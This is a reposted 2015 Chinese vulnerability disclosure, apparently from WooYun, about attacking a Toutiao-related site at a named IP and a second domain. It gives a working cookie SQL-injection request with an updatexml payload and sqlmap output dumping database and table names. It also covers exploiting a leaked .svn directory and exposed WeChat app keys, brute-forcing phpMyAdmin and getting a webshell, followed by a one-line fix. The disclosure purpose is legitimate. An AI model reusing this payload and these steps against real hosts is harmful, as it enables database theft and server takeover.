记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

今日头条某站cookie注入+源码泄露+getshell+微信key泄露

2015-06-19 04:10

http://42.96.190.138/

这个站存在SQL注入

应该不止一处



cookie注入 数据包如下



code 区域
GET /index.php?g=WEBAPP&m=Index&a=getCategoryPagePropertyDepartment HTTP/1.1

Host: 42.96.190.138

Proxy-Connection: keep-alive

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2376.0 Safari/537.36

Accept: */*

Referer: http://42.96.190.138:3333/index.php?g=WEBAPP&page=cusform-formlist&dept_id=1%20and%201=if(1=2,1,(select%201%20union%20select%202))

Accept-Encoding: gzip, deflate, sdch

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4,ja;q=0.2

Cookie: PHPSESSID=sqr24iplkeltnokj5g43q7et52; YP_onlineid=%22796df709c9c89a5d3e0e44e600a3efb8%22; last_update_time=2015-04-30+11%3A47%3A55; dept_id=11119 and 1=(updatexml(1,concat(0x3a,(select user() from mysql.user)),1)); YP_think_language=%22cn%22







Snip20150430_1.png



code 区域
available databases [2]:

[*] information_schema

[*] ttbdxt





code 区域
[11:59:41] [INFO] retrieved: imi_activity_count_plus_20150426

[11:59:41] [INFO] retrieved: imi_activity_count_plus_20150427

[11:59:41] [INFO] retrieved: imi_activity_count_plus_20150422

[11:59:41] [INFO] retrieved: imi_activity_count_plus_20150424

[11:59:41] [INFO] retrieved: imi_activity_count_plus_20150425

[11:59:42] [INFO] retrieved: imi_activity_count_url

[11:59:42] [INFO] retrieved: imi_activity_log

[11:59:42] [INFO] retrieved: imi_activity_prize55122

[11:59:42] [INFO] retrieved: imi_activity_count_plus_20150429

[11:59:42] [INFO] retrieved: imi_activity_prize_record55122

[11:59:42] [INFO] retrieved: imi_activity_record55122

[11:59:42] [INFO] retrieved: imi_activity_count_plus_20150428

[11:59:42] [INFO] retrieved: imi_app_log

[11:59:42] [INFO] retrieved: imi_activity_count_plus_20150430

[11:59:42] [INFO] retrieved: imi_block

[11:59:42] [INFO] retrieved: imi_cart

[11:59:42] [INFO] retrieved: imi_category

[11:59:42] [INFO] retrieved: imi_attachment



每天更新 最新数据



imi_config中发现



| 图片最小宽度 | 0 | http://appadmin.imixun.com/ | watermark_minwidth |

| 5 | CMS地址 | 0 | https://download.imixun.com/index.php?m=Download&appcode=ttbdxt&publishtype=online | site_url |

| 5 | 水印最小高度 | 0 | https://download.imixun.com/index.php?m=Download&appcode=ttbdxt&publishtype=online | watermark_minheight



Snip20150430_3.png



下载抓包到了



ttbdxt.imixun.com/index.php?g=API&m=GetActivityDetail







漏洞证明:

ttbdxt.imixun.com

这个站存在相同的注入

并且是root权限的 直接shell

Snip20150430_4.png



Snip20150430_9.png







再回来看42.96.190.138



http://42.96.190.138/.svn/entries

代码泄露



Snip20150430_6.png



weixin的appid和secret也漏了

Snip20150430_7.png







虽然 42这个站注入不是root 但是 有phpmyadmin

http://42.96.190.138/phpmyadmin 可以爆破root密码



简单审计代码发现也可以shell

可以靠create这个功能写入shell

Snip20150430_8.png

修复方案:

删除svn修复弱口令参数过滤

知识来源: www.wooyun.org/bugs/wooyun-2015-0111246

阅读:134818 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“今日头条某站cookie注入+源码泄露+getshell+微信key泄露”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云